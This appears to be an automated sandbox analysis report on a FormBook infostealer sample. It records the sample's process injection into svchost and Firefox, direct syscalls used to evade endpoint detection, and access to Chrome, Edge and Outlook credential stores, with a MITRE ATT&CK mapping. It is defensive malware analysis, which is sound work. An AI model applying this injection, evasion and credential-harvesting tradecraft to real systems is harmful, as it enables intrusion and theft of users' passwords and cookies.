Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]	2_2_035BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]	2_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]	2_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]	2_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]	2_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]	2_2_035B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]	2_2_035C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]	2_2_035649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_035FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]	2_2_035C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]	2_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]	2_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_035BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]	2_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]	2_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]	2_2_03560854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]	2_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]	2_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]	2_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]	2_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]	2_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]	2_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]	2_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]	2_2_035BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_00240B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00240B62

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00212622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00212622
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0020083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0020083F
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_002009D5 SetUnhandledExceptionFilter,	0_2_002009D5
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00200C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00200C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mtstocom.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: NULL target: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: NULL target: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\mtstocom.exe

Thread register set: target process: 3320

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BE9008

Jump to behavior

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

0_2_00241201

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_00222BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00222BA5

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0024B226 SendInput,keybd_event,

0_2_0024B226

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_002622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_002622DA

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\smQoKNkwB7.exe"	Jump to behavior
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Process created: C:\Windows\SysWOW64\mtstocom.exe "C:\Windows\SysWOW64\mtstocom.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

0_2_00240B62

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_00241663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00241663

Source: smQoKNkwB7.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: wjIagcdbKdk.exe, 00000007.00000002.3568829035.0000000001871000.00000002.00000001.00040000.00000000.sdmp, wjIagcdbKdk.exe, 00000007.00000000.2800986058.0000000001870000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: smQoKNkwB7.exe, wjIagcdbKdk.exe, 00000007.00000002.3568829035.0000000001871000.00000002.00000001.00040000.00000000.sdmp, wjIagcdbKdk.exe, 00000007.00000000.2800986058.0000000001870000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: wjIagcdbKdk.exe, 00000007.00000002.3568829035.0000000001871000.00000002.00000001.00040000.00000000.sdmp, wjIagcdbKdk.exe, 00000007.00000000.2800986058.0000000001870000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: wjIagcdbKdk.exe, 00000007.00000002.3568829035.0000000001871000.00000002.00000001.00040000.00000000.sdmp, wjIagcdbKdk.exe, 00000007.00000000.2800986058.0000000001870000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_00200698 cpuid

0_2_00200698

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_00258195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00258195

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0023D27A GetUserNameW,

0_2_0023D27A

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0021B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0021B952

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001E42DE

Source: smQoKNkwB7.exe, 00000000.00000002.2345466057.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: mcupdate.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3567988233.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2889384999.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3568159878.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3569278704.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3580689111.00000000095B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2890849255.0000000006400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3569480594.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2890116431.00000000033F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\mtstocom.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: smQoKNkwB7.exe	Binary or memory string: WIN_81
Source: smQoKNkwB7.exe	Binary or memory string: WIN_XP
Source: smQoKNkwB7.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: smQoKNkwB7.exe	Binary or memory string: WIN_XPe
Source: smQoKNkwB7.exe	Binary or memory string: WIN_VISTA
Source: smQoKNkwB7.exe	Binary or memory string: WIN_7
Source: smQoKNkwB7.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3567988233.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2889384999.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3568159878.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3569278704.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3580689111.00000000095B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2890849255.0000000006400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3569480594.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2890116431.00000000033F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00261204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00261204
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00261806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00261806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
